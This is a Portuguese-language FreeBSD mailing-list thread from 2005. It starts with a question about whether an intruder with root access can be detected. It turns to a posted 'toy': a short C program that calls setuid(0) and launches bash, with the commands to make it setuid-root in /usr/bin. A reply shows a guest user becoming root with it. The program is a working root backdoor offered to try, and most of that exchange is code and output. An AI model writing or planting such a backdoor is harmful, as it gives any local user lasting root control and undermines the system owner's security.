Testei no FreeBSD 5.3, vejam o resultado:

Usuário guest faz o logon e depois que o programa roda ele vira root

$ id
uid=2001(guest) gid=2000(users) groups=2000(users)
$ ./babash
bash-2.05b# id
uid=0(root) gid=2000(users) groups=2000(users)


--

 ___________________________________________
 WAGNER REZENDE SERRANO
 Mobile: +55-11-8456-7828
 Phone : +55-11-5051-5278
 e-mail: [EMAIL PROTECTED]
 MSN/messenger: [EMAIL PROTECTED]
 ICQ 270-897-145

--


Augusto, Alexandre wrote:
Oi pessoal,

Tentem isso:

vi babash.c
#include <stdlib.h>
        main () {
                setuid(0);
                system("/bin/bash");
        }

/usr/local/bin/gcc babash.c -o babash
chmod 4755 babash
mv babash /usr/bin/babash

Não me lembro quem escreveu esse brinquedo. Não fui eu pois meu conhecimento
em C é pobre...

Tem rodado em maquinas solaris 8, 9  e Linux...
Ainda não rodei no BSD ...

Abraço



-----Mensagem original-----
De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome
de Celso Viana
Enviada em: sexta-feira, 8 de abril de 2005 10:12
Para: Lista de discussao do grupo FUG-BR
Assunto: Re: [FUG-BR] segurança

sim...... uso secure level 2

o cenário seria esse: tendo acabado de instalar o OS, instalei um
software que tem uma falha de segurança e eu não sei disso;
essa máquina está visível para o mundo (ip real); essa máquina ainda não foi atualizada; o OS está em secure level 2;


minha dúvida: imaginemos que alguém, nesse momento, descobriu essa
máquina e resolva explorar essa vulnerabilidade e tenha ganhado acesso
root; eu, estando logado no console, posso identificar esse invasor?
ele está visível para os comandos do sistema? é possível fazer com que
o sistema emita um alarme qdo esse invasor consiga o acesso?

Celso


Celso

On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA
<[EMAIL PROTECTED]> wrote:

depende

vc usa secure level kernel ????

pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :)


Celso Viana wrote:


all,

Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD,
ganhando acesso root, esse alguém fica totalmente invisível? ou os
comandos "w, who, etc" identificam o invasor?

Celso

_______________________________________________
Freebsd mailing list
Freebsd@fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br



_______________________________________________ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br



_______________________________________________
Freebsd mailing list
Freebsd@fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br

_______________________________________________
Freebsd mailing list
Freebsd@fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br





_______________________________________________ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br

Responder a